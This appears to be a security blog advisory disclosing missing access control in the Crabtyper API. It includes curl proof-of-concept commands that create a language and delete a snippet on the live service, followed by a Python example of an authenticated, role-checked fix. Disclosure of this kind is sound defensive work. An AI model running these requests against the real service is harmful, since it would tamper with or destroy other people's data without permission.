API Security Blog

Improper Access Control in Crabtyper API

# Description
The API allows any user to create languages and snippets, and to delete them. A malicious actor can therefore add offensive snippets that may be shown to any user, and anyone can take the service down entirely by deleting every snippet.

The root cause is insufficient access control in the API: the create and delete endpoints do not verify that the caller is permitted to modify data.

# Proof of Concept
Create a language:
```
$ curl -X POST -H "Content-Type: application/json" https://crabtyper-api.azurewebsites.net/api/languages -d '{"name":"example"}'
```

Delete a snippet:
```
$ curl -X DELETE https://crabtyper-api.azurewebsites.net/api/snippets/4a917fe1-ed65-4134-b8de-423023970ac9
```

These are just two examples; snippets can also be created in the same way.
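As an added example (not Crabtyper's own code), the missing check expressed as a small Python dispatcher: the vulnerable handler serves every request unconditionally, while the hardened one requires a valid admin bearer token on the POST and DELETE routes and leaves GET public. The HMAC token format, the signing key and the admin-role policy are assumptions made for illustration.

```python
import hmac
import hashlib
import re

# Constructed server-side signing key for this example only (not a real key).
SECRET = b"example-signing-key"

# State-changing routes from the advisory. Reads (GET) stay public; writes
# require an admin. The admin-role policy is assumed, not Crabtyper's own.
MUTATING = [
    ("POST", re.compile(r"^/api/(languages|snippets)$")),
    ("DELETE", re.compile(r"^/api/(languages|snippets)/[0-9a-f-]{36}$")),
]

def issue_token(user: str, role: str) -> str:
    """Mint a minimal HMAC-signed bearer token of the form 'user:role:sig'."""
    body = f"{user}:{role}"
    sig = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}:{sig}"

def verify_token(token: str):
    """Return {'user', 'role'} if the signature is valid, otherwise None."""
    parts = token.split(":")
    if len(parts) != 3:
        return None
    user, role, sig = parts
    expected = hmac.new(SECRET, f"{user}:{role}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None  # tampered role or forged signature
    return {"user": user, "role": role}

def is_mutating(method: str, path: str) -> bool:
    return any(m == method and rx.match(path) for m, rx in MUTATING)

def handle_vulnerable(method: str, path: str, headers: dict) -> int:
    """The pattern the advisory describes: every caller is served, no auth check."""
    return 204 if method == "DELETE" else 201 if method == "POST" else 200

def handle_fixed(method: str, path: str, headers: dict) -> int:
    """Hardened dispatcher: mutating routes need a valid admin bearer token."""
    if is_mutating(method, path):
        auth = headers.get("Authorization", "")
        token = auth[len("Bearer "):] if auth.startswith("Bearer ") else ""
        principal = verify_token(token)
        if principal is None:
            return 401  # missing or invalid credentials
        if principal["role"] != "admin":
            return 403  # authenticated, but not permitted to modify data
    return handle_vulnerable(method, path, headers)
```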
